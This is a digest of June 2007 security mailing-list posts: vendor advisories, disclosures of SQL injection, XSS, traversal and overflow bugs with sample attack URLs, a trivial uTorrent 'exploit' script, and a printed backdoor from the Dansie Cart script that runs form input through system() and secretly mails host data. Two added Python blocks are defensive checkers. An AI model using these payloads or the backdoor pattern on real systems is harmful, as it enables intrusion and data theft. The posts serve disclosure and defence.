[ MDKSA-2007:110 ] - Updated php-pear packages fix directory traversal vulnerability

2007-06-04 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:110
 http://www.mandriva.com/security/
 ___
 
 Package : php-pear
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A security hole was discovered in all versions of the PEAR Installer
 (http://pear.php.net/PEAR). The security hole is the most serious
 hole found to date in the PEAR Installer, and would allow a malicious
 package to install files anywhere in the filesystem.
 
 The vulnerability only affects users who are installing an
 intentionally created package with a malicious intent.  Because the
 package is easily traced to its source, this is most likely to happen
 if a hacker were to compromise a PEAR channel server and alter a
 package to install a backdoor. In other words, it must be combined
 with other exploits to be a problem.
 
 Updated packages have been patched to prevent this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2519
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

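A defender-side illustration of the mitigation the advisory implies, added here and not taken from PEAR or Mandriva: an installer must resolve every destination a package declares against its install root and refuse any entry that escapes it. The install root, the manifest entries and the function names below are all constructed for this example.

```python
import os
import tempfile


class UnsafeInstallPath(ValueError):
    """Raised when a manifest entry would place a file outside the install root."""


def resolve_install_path(install_root, declared_path):
    """Map a package-declared destination onto the filesystem, or refuse it.

    install_root  -- the only directory the installer may write under.
    declared_path -- the destination as declared by the (untrusted) package.
    Returns the absolute target path; raises UnsafeInstallPath otherwise.
    """
    if not declared_path or declared_path != declared_path.strip():
        raise UnsafeInstallPath("empty or whitespace-padded path: %r" % (declared_path,))
    if "\x00" in declared_path:
        raise UnsafeInstallPath("NUL byte in path: %r" % (declared_path,))
    # Manifests use '/' separators; treat backslashes the same so a
    # Windows-style traversal cannot slip past the component checks below.
    parts = declared_path.replace("\\", "/").split("/")
    if parts[0] == "" or parts[0].endswith(":"):
        raise UnsafeInstallPath("absolute path rejected: %r" % (declared_path,))
    # Policy: no '..' component at all, even one that would net out inside
    # the root. Refusing it outright is simpler to reason about than normalising.
    if ".." in parts:
        raise UnsafeInstallPath("parent-directory component rejected: %r" % (declared_path,))
    root = os.path.realpath(install_root)
    clean = [p for p in parts if p not in ("", ".")]
    target = os.path.realpath(os.path.join(root, *clean))
    # Belt and braces: after symlink resolution the target must still sit
    # strictly under the root. commonpath() compares whole components, so a
    # root of /opt/pear does not wrongly accept /opt/pear-evil/x.
    if os.path.commonpath([root, target]) != root or target == root:
        raise UnsafeInstallPath("path escapes install root: %r" % (declared_path,))
    return target


def is_safe_install_path(install_root, declared_path):
    """Boolean convenience wrapper around resolve_install_path()."""
    try:
        resolve_install_path(install_root, declared_path)
        return True
    except UnsafeInstallPath:
        return False


def check_manifest(install_root, declared_paths):
    """Split a manifest's destinations into (accepted, rejected).

    accepted -- list of (declared, resolved_target)
    rejected -- list of (declared, reason)
    """
    accepted, rejected = [], []
    for declared in declared_paths:
        try:
            accepted.append((declared, resolve_install_path(install_root, declared)))
        except UnsafeInstallPath as exc:
            rejected.append((declared, str(exc)))
    return accepted, rejected


# Constructed sample manifest (hypothetical entries, not from any real package).
SAMPLE_DESTINATIONS = [
    "Foo/Bar.php",
    "data/Foo/schema.sql",
    "../../../etc/outside.conf",      # classic traversal out of the root
    "/etc/outside.conf",              # absolute path
    "lib/../../outside.php",          # traversal hidden behind a valid prefix
    "lib\\..\\..\\outside.php",       # same, with backslashes
    "lib/./ok/../inside.php",         # nets out inside, still refused by policy
]

# Root under the temp dir so the example runs anywhere; it need not exist.
EXAMPLE_ROOT = os.path.join(tempfile.gettempdir(), "pear-install-root-example")


def demo():
    """Run the check over the sample manifest against EXAMPLE_ROOT."""
    return check_manifest(EXAMPLE_ROOT, SAMPLE_DESTINATIONS)


if __name__ == "__main__":
    accepted, rejected = demo()
    for declared, target in accepted:
        print("install  %-28s -> %s" % (declared, target))
    for declared, reason in rejected:
        print("REFUSE   %-28s : %s" % (declared, reason))
```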


Disinfectors for the calculator virus (ti89.Gaara)

2007-06-04 Thread Piotr Bania


Hey,

For those who are interested, I made two types of Gaara (the calculator 
virus) disinfectors. The first one patches the virus body, which causes 
control to return to the host just when the EPO injection transfers 
control to the virus. So the virus will not get executed at all.
And the second one tries to find an EPO injection by searching for 
BRA opcodes and testing them for suitable conditions.



Here are the codes:
Dis1:
Source:
http://piotrbania.com/all/ti89/dis1.c

Binary:
http://piotrbania.com/all/ti89/dis1.89z

Dis2:
Source:
http://piotrbania.com/all/ti89/dis2.c

Binary:
http://piotrbania.com/all/ti89/dis2.89z


I hope you will find them somehow interesting.

best regards,
pb


--

Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com  - Key ID: 0xBE43AC33


  - "The more I learn about men, the more I love dogs."



Unpatched input validation flaw in Firefox 2.0.0.4

2007-06-04 Thread Thor Larholm

Firefox 2.0.0.4 contains a fix for a directory traversal vulnerability
that allowed you to read local files through the resource protocol.

However, the patch only partially fixed the vulnerability on Windows
systems and accidentally circumvents an existing input validation
check.

The net result is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.

http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/

Cheers

Thor Larholm


Re: [PLESK 7.5 Reload] & [PLESK 7.6 for MS Windows] path passing and disclosure vulnerability

2007-06-04 Thread leo
I tried this on my server and it doesn't seem to work - asks me to login


RE: bugtraq submission

2007-06-04 Thread Warner Moore
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Friday, June 01, 2007 12:50 PM
> To: bugtraq@securityfocus.com
> Subject: bugtraq submission
> 
> There are numerous XSS vulnerabilities in PHPLive v3.2.2 
> (Maybe others)


This vendor is incredibly non-responsive and apathetic about any
security issue.  I have yet to be contacted regarding previous issues and we
often end up having to fix them ourselves.

Anyone have better luck?

Warner



rPSA-2007-0115-1 libexif

2007-06-04 Thread rPath Update Announcements
rPath Security Advisory: 2007-0115-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Denial of Service
Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//1/0.6.15-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package can cause applications to
crash when loading malformed exif data.  It is not currently known
whether this vulnerability can be exploited to execute malicious code.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


rPSA-2007-0114-1 mutt

2007-06-04 Thread rPath Update Announcements
rPath Security Advisory: 2007-0114-1
Published: 2007-06-04
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Privilege Escalation
Updated Versions:
mutt=/[EMAIL PROTECTED]:devel//1/1.4.2.3-0.1-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683
http://dev.mutt.org/trac/ticket/2846
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=239890
https://issues.rpath.com/browse/RPL-1232
https://issues.rpath.com/browse/RPL-1391

Description:
In previous versions of the mutt package, it is possible for an attacker
to subvert other local users' mutt processes causing them to run
attacker-provided code. Additionally, it is possible for a hostile server 
masquerading as a user's APOP server to determine some characters from a
user's password.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


SYM07-009,Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service

2007-06-04 Thread secure
Symantec Security Advisory

http://www.symantec.com/avcenter/security/Content/2007.06.01.html

SYM07-009

1 June, 2007
Symantec Storage Foundation for Windows Volume Manager:  Authentication Bypass 
and Potential Code Execution in Scheduler Service

Revision History
None 

Severity
Medium 


Remote Access               Yes, Local network access required
Local Access                No
Authentication Required     No
Exploit publicly available  No


Overview
An authentication bypass, remote code execution vulnerability has been 
identified and resolved in the Symantec Storage Foundation for Windows v5.0 
Volume Manager Scheduler Service.  Successful exploitation could result in 
potential compromise of the targeted system.

Product(s) Affected
Product                                   Version   Solution(s)
Symantec Storage Foundation for Windows   5.0       http://support.veritas.com/docs/288627


Product(s) Not Affected
Product                                   Version
Symantec Storage Foundation for Windows   3.1
Symantec Storage Foundation for Windows   4.1, 4.1RP1
Symantec Storage Foundation for Windows   4.2, 4.2RP1, 4.2RP2

Details
3Com's Zero Day Initiative notified Symantec of an authentication bypass and 
arbitrary code execution vulnerability discovered in the Symantec Storage 
Foundation for Windows Scheduler Service, VxSchedService.exe.  The Scheduler 
Service server, initially introduced in Symantec Storage Foundation for Windows 
v5.0, listens for incoming scheduling messages from client systems.  An 
attacker with network access who could successfully connect directly to the 
Scheduler Service socket could bypass the built-in authentication in the 
management console.  By properly manipulating this vector, the attacker has the 
potential to possibly add arbitrary commands to the registry that could be 
executed during normal scheduled runs.
This vulnerability, if successfully exploited, would most likely be initiated 
by a malicious user authenticated on the local network since the affected 
service port should not normally be available to other than authorized network 
systems.  Any potentially successful attack by a non-authorized remote attacker 
would most likely be a scenario of enticing an authorized user to run or allow 
to run malicious code that might successfully exploit this issue.

Symantec Response
Symantec takes the security of our products and our customers very seriously. 
Symantec engineers have verified and corrected this issue in Symantec’s Storage 
Foundation for Windows 5.0. 

Updates are available for supported products. Symantec recommends customers 
apply the latest product update available for their supported product versions 
to enhance their security posture and protect against potential security 
threats of this nature.

Symantec knows of no exploitation of or adverse customer impact from this issue.


The patches listed above for affected product/version are available from the 
following location:
 http://support.veritas.com/docs/288627
Best Practices
As part of normal best practices, Symantec strongly recommends: 
* Restrict access to administration or management systems to privileged users.
* Restrict remote access, if required, to trusted/authorized systems only.
* Run under the principle of least privilege where possible to limit the impact 
of exploit by threats. 
* Keep all operating systems and applications updated with the latest vendor 
patches. 
* Follow a multi-layered approach to security. Run both firewall and 
anti-malware applications, at a minimum, to provide multiple points of 
detection and protection to both inbound and outbound threats. 
* Deploy network and host-based intrusion detection systems to monitor network 
traffic for signs of anomalous or suspicious activity. This may aid in 
detection of attacks or malicious activity related to exploitation of latent 
vulnerabilities

CVE
The Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE 
Candidate CVE-2007-2279 to this issue.

This issue is a candidate for inclusion in the CVE list (http://cve.mitre.org), 
which standardizes names for security problems. 

Credit:
Symantec would like to thank 3Com/ZDI for reporting this issue and for 
providing full coordination while Symantec resolved it.


FLEA-2007-0024-1: libexif

2007-06-04 Thread Foresight Linux Essential Advisory Service

Foresight Linux Essential Advisory: 2007-0024-1
Published: 2007-06-04

Rating: Moderate

Updated Versions:
libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
https://issues.rpath.com/browse/RPL-1431

Description:
Previous versions of the libexif package were vulnerable to an int overflow 
when loading EXIF data which could cause a crash (denial of service) or 
potentially allow the attacker to execute arbitrary code at the permission 
level of the user running a program which uses libexif.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html



[SECURITY] [DSA 1291-4] New samba packages fix regression

2007-06-04 Thread Moritz Muehlenhoff

--------------------------------------------------------------------------
Debian Security Advisory DSA 1291-4                      [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
June 4th, 2007                           http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: samba
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447

The security update for CVE-2007-2446 introduced a regression, which
broke connection to domain member servers in some scenarios. This update
fixes this regression.

For the stable distribution (etch), this regression has been fixed in
version 3.0.24-6etch4.

The old stable distribution (sarge) is not affected by this problem.

For the unstable distribution (sid) this regression has been fixed in
version 3.0.25a-1.

We recommend that you upgrade your samba package.

Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- ---


n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory

2007-06-04 Thread security
n.runs AG  
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2007.014   04-Jun-2007


Vendor: F-Secure Corporation, http://www.f-secure.com
Affected Products:  
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier 
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00
and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier 
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier
Vulnerability: Infinite Loop DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07    initial notification to F-Secure Corporation
  2007/05/08    F-Secure Corporation response
  2007/05/08    PGP public keys exchange
  2007/05/08    PoC files sent to F-Secure Corporation
  2007/05/14    F-Secure Corporation acknowledged the PoC files
  2007/05/18    F-Secure Corporation validated the vulnerability
  2007/05/18    F-Secure Corporation notified update release date
  2007/05/30    F-Secure Corporation released update with fixes


Overview:
 
F-Secure Corporation protects consumers and businesses against computer
viruses and other threats from the Internet and mobile networks.
F-Secure award-winning solutions are available for workstations, gateways,
servers and mobile phones. They include antivirus and desktop firewall with
intrusion prevention, antispam and antispyware solutions, as well as network
control solutions for Internet Service Providers.
F-Secure protection is also available as a service through major ISPs, such
as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is
the global market leader in mobile phone protection provided through mobile
operators, such as T-Mobile and Swisscom and mobile handset manufacturers
such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing
engine.

In detail, the following flaw was determined:

- Infinite Loop in .ARJ files parsing


Impact:

This problem can lead to a remote denial of service, provoked by high CPU
consumption and exhaustion of storage resources, if an attacker carefully
crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in the F-Secure Corporation software products
mentioned above, on all platforms supported by the affected products. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 30.May.2007 to solve this vulnerability. For detailed information about
the fixes follow the link in References [1] section of this document.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://www.f-secure.com/security/fsc-2007-3.shtml [1]

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.



My Datebook SQL Injection + XSS

2007-06-04 Thread ls
Application: My Datebook
Web Sites: http://mealex.com/scripts.html
   http://www.theadminshop.com/
Versions: any (no version numbers can be found)
Platform: linux, windows, freebsd, sun
Bug: SQL Injection + XSS
Severity: High (since there is no need to authenticate.)
Fix Available: No

---

1) Introduction
2) Bug
3) The Code
4) Fix
5) About
6) Disclaimer

===
1) Introduction
===

"My DataBook is a simple, php & mysql personal organizer."

==
2) Bug
==

Many SQL Injections and many XSS.

===
3) Proof of concept.
===

The file diary.php is subject to several SQL Injections.

Some examples are:

http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%27
http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%00'

XSS example:


http://site/apppath/diary.php?Sec=diary&month=06&year=alert(123123123)%3B&day=01

=
4) Fix
=

The author's email or contact details were not available.
If you are using this software, try to fix it yourself or change it.


5) About Serapis.net


www.Serapis.net is a portal dedicated to web defacements, 
tracking defacements around the world.

==
6) Disclaimer
==

The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising out 
of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk.

http://www.serapis.net
http://calima.serapis.net/blogs/


n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory

2007-06-04 Thread security
n.runs AG  
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2007.015   04-Jun-2007


Vendor: F-Secure Corporation, http://www.f-secure.com
Affected Products:  
F-Secure Anti-Virus for Workstations version 7.00 and earlier
F-Secure Anti-Virus for Windows Servers version 7.00 and earlier
F-Secure Anti-Virus for Citrix Servers version 5.52
F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier
F-Secure Anti-Virus Client Security version 7.00 and earlier
F-Secure Anti-Virus for MS Exchange version 7.00 and earlier
F-Secure Internet Gatekeeper version 6.60 and earlier 
F-Secure Internet Security 2005, 2006 and 2007
F-Secure Anti-Virus 2005, 2006 and 2007
Solutions based on F-Secure Protection Service for Consumers version 7.00
and earlier
F-Secure Anti-Virus for Linux Servers version 4.65 and earlier
F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier 
F-Secure Anti-Virus Linux Client Security 5.52 and earlier
F-Secure Anti-Virus Linux Server Security 5.52 and earlier
F-Secure Internet Gatekeeper for Linux 2.16 and earlier
Vulnerability: Infinite Loop DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07    initial notification to F-Secure Corporation
  2007/05/08    F-Secure Corporation response
  2007/05/08    PGP public keys exchange
  2007/05/08    PoC files sent to F-Secure Corporation
  2007/05/14    F-Secure Corporation acknowledged the PoC files
  2007/05/18    F-Secure Corporation validated the vulnerability
  2007/05/18    F-Secure Corporation notified update release date
  2007/05/30    F-Secure Corporation released update with fixes


Overview:
 
F-Secure Corporation protects consumers and businesses against computer
viruses and other threats from the Internet and mobile networks.
F-Secure award-winning solutions are available for workstations, gateways,
servers and mobile phones. They include antivirus and desktop firewall with
intrusion prevention, antispam and antispyware solutions, as well as network
control solutions for Internet Service Providers.
F-Secure protection is also available as a service through major ISPs, such
as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is
the global market leader in mobile phone protection provided through mobile
operators, such as T-Mobile and Swisscom and mobile handset manufacturers
such as Nokia.

Description:

A remotely exploitable vulnerability has been found in the files parsing
engine.

In detail, the following flaw was determined:

- Infinite Loop in FSG packed files parsing


Impact:

This problem can lead to a remote denial of service, provoked by high CPU
consumption and exhaustion of storage resources, if an attacker carefully
crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in the F-Secure Corporation software products
mentioned above, on all platforms supported by the affected products. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 30.May.2007 to solve this vulnerability. For detailed information about
the fixes follow the link in References [1] section of this document.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://www.f-secure.com/security/fsc-2007-3.shtml [1]

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.



Re: Buffer overflow in BusinessMail email server system 4.60.00

2007-06-04 Thread Steve Tornio

[EMAIL PROTECTED] wrote:

This problem was corrected within 14 days, and a new SMTP server was provided 
on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you 
still claim it is a problem.



It is unclear who "you" is supposed to be here.  I'm guessing this is 
the vulnerability referred to by:


OSVDB 18407
CVE 2005-2472
ISS 21636
Secunia 16306
Bugtraq 14434

None of these indicate a solution is available.

The Mail List post reporting this vulnerability was 
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0002.html


In the post, it says that a patch will soon be available.  A quick 
glance at the download page at http://www.netcplus.com/downloads.html 
doesn't reveal a link to download the patch for 4.6.  I also don't see 
any advisory for users of 4.6 that a patch is available.


We will be happy to update our entry at osvdb.org, after verifying that 
a patch exists for 4.6, and an upgrade to 4.7 also solves the problem. 
Is that correct?


Thanks,
Steve Tornio
osvdb.org


You **were** notified of the release of the fix, and we have many other 
confirmations that it is indeed a good fix.

We are now at 4.7 of BusinessMail, and that also still blocks this 
"vulnerability", and yet you continue to publish out of date and inaccurate 
information as being the truth.

Kindly update your published information as relevant to reflect the true facts 
of this buglet.

You can download an evaluation BusinessMail system from our web site to test 
this for yourself if you still do not believe us.

Thank You






uTorrent overflow

2007-06-04 Thread Dj . r4iDeN
#!/bin/bash
#
#   uTorrent overflow
#   mail: dj.r4iden[at]gmail.com
#   greet to : StrikerX , St0rM-MaN ,  MedoZero , hack_egy ,CPU
# you must kno the victim ip and the port he use in uTorrent 
#
clear
echo "Enter your victam IP?"
echo " "
read victamIP
victamIP=$victamIP
echo " Enter your victam port?"
echo " "
read victamport
victamport=$victamport
echo "after you connect hold the enter key"
echo -n "you wanna connect now?(y/n)"
read X
if [ "$X" = "y" ];then
telnet $victamIP $victamport
elif [ "$X" = "n" ];then
echo " good bye"
echo -n "exploit by dj.r4iden[at]gmail.com"
fi


Recent OpenSSL exploits

2007-06-04 Thread Ryan's spam address
Has anyone seen anything floating around for the OpenSSL 
SSL_Get_Shared_Ciphers Buffer Overflow (CVE-2006-3738/Bugtraq ID 20249)?


I've been told there is one that has recently been floating around with 
blackhats, but I'm unable to confirm/deny.



Ryan



CERN Image Map Dispatcher

2007-06-04 Thread h0tturk
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with 
FrontPage. I found three bugs in "htimage.exe": 1) Gives us the full path 
to the root directory 2) Simple buffer overflow 3) Allows us to access files.


Problem #1
~~
Like I said, the first bug gives us the full path to the root directory. I 
tested this vulnerability against some servers; all were vulnerable!

Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 
4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 
(All Windows based web servers are vulnerable if we have permission 
to execute "htimage.exe" + if "htimage.exe" exists).

To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory 
(it's installed by default) and permission to execute it. That's why only 
Windows is vulnerable; Unix based systems can't execute "*.exe" files.

If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:

--------------------------------------------------------------------
Error

Error calling HTImage:

Picture config file not found, tried the following:

q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
--------------------------------------------------------------------

Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".

Problem #2
~~
Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and
"FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" buffer overflows if we access it like:
http://server/cgi-bin/htimage.exe/<741 A's>?0,0.

--------------------------------------------------------------------
HTIMAGE caused an invalid page fault in
module  at :41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=
Bytes at CS:EIP:

Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
-
---
 + <500 Server Error>

First remote FrontPage exploit?


Problem #3
~~
It's not a serious bug. Using "htimage.exe" we can access files on server, but
we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:

----------
Error

Error calling HTImage:

HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
----------

NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden

Solution

1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)


Dansie Cart Script Exploit Reported

2007-06-04 Thread h0tturk
Synopsis : This program -deliberately- allows arbitrary commands to be
  executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup.  While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, '[EMAIL PROTECTED]'.  This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

--
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
---

The call that creates this email address and sends the mail is the
function 'there3'.

---
sub there3
{
   # Only runs on non-NT systems where a sendmail-style $mailprog exists.
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
      # Recipient address and subject are assembled from obfuscated tokens
      # decoded by 'there2' (user "@" domain "." tld).
      $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
      $b = &there2('8v59_3jhhzi8');
      pop(@there2);
      pop(@there2);
      $c = &there2("@there2");
      # Pipes the message straight into $mailprog, addressed to $a.
      open (TECH, "|$mailprog $a");
      print TECH "To: $a\n";
      print TECH "From: $a\n";
      print TECH "Subject: $b\n\n";
      print TECH "$path3\n";
      print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
      print TECH "$c\n";
      print TECH "$e $there\n" if ($e);
      close (TECH);
   }
}
---

The ciphered strings, when passed through 'there2', result in:

  8v59          == tech
  kte3cv        == dansie
  ev8           == net
  8v59_3jhhzi8  == tech-support
  $a            == [EMAIL PROTECTED]
  $b            == Subject: tech-support

This seems curious, but plausible reasons could include ensuring license
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

--
if ( ( ( $FORM{'?'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?'} ) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
   system("$FORM{'?'}");
   }
   else
   {
   open(ELIF,"|$FORM{'?'}");
   }
   exit;
}
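As an added example (not Dansie's code, nor part of the original post), here is the same substitution re-implemented in Python so an auditor can decode every there2() literal in the script statically rather than running the cart; the regex, the helper names and the sample source lines are constructed here.

```python
import re

# Added example (not Dansie's code): a Python re-implementation of the Perl
# tr/// tables in 'there2'.  Perl's tr maps each character of the first list
# to the character at the same position in the second list, so the three
# tr/// lines collapse into one translation table.
_SRC = "abcdefghijklmnopqrstuvwxyz0123456789"
_DST = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth"
assert len(_SRC) == len(_DST) == 36
_TABLE = str.maketrans(_SRC + "_@", _DST + "-.")   # tr/_/-/ and tr/\@/\./


def there2(token: str) -> str:
    """Decode one obfuscated token exactly as the Perl subroutine does."""
    return token.translate(_TABLE)


def recover_address(user: str, domain: str, tld: str) -> str:
    """Join three tokens the way 'there3' builds $a (user@domain.tld)."""
    return f"{there2(user)}@{there2(domain)}.{there2(tld)}"


# Constructed helper: matches the literal arguments of &there2('...') calls.
_CALL = re.compile(r"&there2\('([^']*)'\)")


def decode_calls(perl_source: str) -> dict:
    """Map every literal there2() argument found in the source to its
    plaintext, so an auditor can read what the script hides."""
    return {tok: there2(tok) for tok in _CALL.findall(perl_source)}


# Constructed sample: the two assignments from the posted 'there3' subroutine.
SAMPLE_PERL = r"""
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
"""

if __name__ == "__main__":
    for cipher, plain in decode_calls(SAMPLE_PERL).items():
        print(f"{cipher:14} -> {plain}")
    print("address:", recover_address("8v59", "kte3cv", "ev8"))
```

Because tr/// here is a bijection, the same table run in reverse also shows how any new hidden string would have been produced, which is useful when comparing a vendor release against a suspected altered copy.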



2007-06-03: PeerCast streaming server submits cleartext password

2007-06-04 Thread mpeg
Hi there,

PeerCast also submits the configured password in cleartext, e.g.
http://www.domain.tld:7144/admin?cmd=login&pass=asdfg.jodi.org&submit=Login

